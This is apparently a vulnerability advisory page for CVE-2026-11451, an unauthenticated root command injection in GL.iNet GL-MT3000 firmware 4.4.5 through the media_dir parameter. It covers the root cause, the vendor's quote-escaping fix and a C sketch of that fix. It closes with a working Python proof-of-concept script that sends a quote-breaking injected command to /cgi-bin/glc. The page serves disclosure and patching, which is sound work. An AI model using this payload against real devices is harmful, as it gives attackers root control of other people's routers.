High severity 7.3 · NVD Advisory · Published Jun 7, 2026

CVE-2026-11451

Description

Command injection in GL.iNet GL-MT3000 firmware 4.4.5 allows remote attackers to execute arbitrary commands as root.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A command injection vulnerability exists in the /cgi-bin/glc endpoint of GL.iNet GL-MT3000 devices running firmware version 4.4.5. The nas-web.so plugin forwards requests to the local gl_nas_sys daemon, which handles FTP protocol configurations. The media_dir parameter is passed unsanitized into snprintf() and system() calls, allowing for command injection.

Exploitation

An unauthenticated remote attacker can exploit this by sending a POST request to /cgi-bin/glc with a crafted JSON payload. The payload should include a single quote in the media_dir argument to break out of the expected quoting context, followed by shell metacharacters like ;, >, and # to inject and execute arbitrary commands. The vulnerable flow involves the set_proto_config method being called without authentication checks [1].

Impact

Successful exploitation allows an attacker to execute arbitrary commands with root privileges on the affected device. This could lead to a full compromise of the device, including potential data exfiltration, modification, or the establishment of persistent access.

Mitigation

GL.iNet addressed this vulnerability in firmware version 4.8.1 by implementing proper sanitization of the media_dir parameter, specifically by escaping single quotes before writing to the FTP configuration. Users should upgrade to firmware version 4.8.1 or later to mitigate this risk. The vendor has confirmed that versions prior to 4.8.1 are affected [1].

AI Insight generated on Jun 7, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The FTP protocol handler in gl_nas_sys passes user-supplied input from the media_dir parameter unsanitized into snprintf() calls that are then executed by system()."

Attack vector

An unauthenticated attacker can send a POST request to the /cgi-bin/glc endpoint. The request body is a JSON payload targeting the "nas-web" object and the "set_proto_config" method. When the "media_dir" argument within the JSON payload includes shell metacharacters such as single quotes, semicolons, and hash symbols, the value breaks out of the intended string context and the injected commands are executed with root privileges [1].

Affected code

The vulnerability lies within the FTP protocol handler in the gl_nas_sys daemon, specifically in the function FUN_0045dc80. This function processes the "media_dir" parameter extracted from a JSON payload. It uses two snprintf() calls to construct commands, which are then executed via system(), without proper sanitization of shell metacharacters [1]. The entry point /www/cgi-bin/glc and the nas-web.so plugin also contribute by forwarding the request without authentication or input validation [1].

What the fix does

The vendor states that in version 4.8.1, the code now escapes single quotes using escape_single_quote() before writing media_dir to the FTP configuration command. This prevents payloads that rely on closing a single quote, appending commands with a semicolon, and commenting out the tail with '#' from executing. The vendor verified that similar payloads no longer trigger command execution, with the input being treated as ordinary configuration content instead of executable commands [1].
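The quoting fix described above, sketched as an added example (not the vendor's code): the body of escape_single_quote() is an assumed implementation, and the `cfgtool` command template, `build_cmd()` and `has_unquoted_metachar()` are hypothetical names used only to compare the pre-fix and post-fix command strings without executing them.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical template: the real gl_nas_sys format string is not on the page. */
#define CMD_FMT "cfgtool set ftp.media_dir='%s'"

/* Rewrite each ' as '\'' so the value stays one single-quoted shell word.
 * Returns -1 if out is too small; callers must reject, never truncate. */
int escape_single_quote(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    if (outsz == 0) return -1;
    for (; *in; in++) {
        size_t need = (*in == '\'') ? 4 : 1;
        if (o + need >= outsz) return -1;      /* keep room for the NUL */
        if (*in == '\'') memcpy(out + o, "'\\''", 4);
        else out[o] = *in;
        o += need;
    }
    out[o] = '\0';
    return 0;
}

/* escape=0 is the pre-fix pattern (raw value between the quotes);
 * escape=1 is the post-fix pattern. Fails closed on overflow. */
int build_cmd(const char *dir, int escape, char *cmd, size_t sz)
{
    char esc[512];
    if (escape && escape_single_quote(dir, esc, sizeof esc) != 0) return -1;
    int n = snprintf(cmd, sz, CMD_FMT, escape ? esc : dir);
    return (n < 0 || (size_t)n >= sz) ? -1 : 0;
}

/* Minimal sh lexer (single quotes and backslash only): returns 1 if an
 * operator character sits outside quotes or a quote is left open. */
int has_unquoted_metachar(const char *cmd)
{
    int in_sq = 0;
    for (const char *p = cmd; *p; p++) {
        if (in_sq) { if (*p == '\'') in_sq = 0; }
        else if (*p == '\'') in_sq = 1;
        else if (*p == '\\' && p[1]) p++;      /* escaped char is literal */
        else if (strchr(";|&<>#`$", *p)) return 1;
    }
    return in_sq;
}
```

Escaping keeps the value inert only while the format string wraps `%s` in single quotes; passing the path as an argv element to an exec-family call instead of system() removes the shell from the path entirely.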

Preconditions

  • network: The target device must be accessible over the network.
  • auth: No authentication is required to exploit this vulnerability.
  • input: The attacker must be able to send a crafted JSON payload to the /cgi-bin/glc endpoint.

Reproduction

```python
#!/usr/bin/env python3
import json, urllib.request, ssl

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

dev_name = "/codexp20';id>/tmp/nas_proto_poc 2>&1;#"

body = {
    "object": "nas-web",
    "method": "set_proto_config",
    "args": {
        "protos": [{
            "name": "ftp",
            "enable": 1,
            "media_dir": dev_name
        }]
    }
}

req = urllib.request.Request(
    "https://192.168.8.1/cgi-bin/glc",
    data=json.dumps(body).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)
print(urllib.request.urlopen(req, timeout=10, context=ctx).read().decode())
print("[+] check /tmp/nas_proto_poc on target")
```

Generated on Jun 7, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5
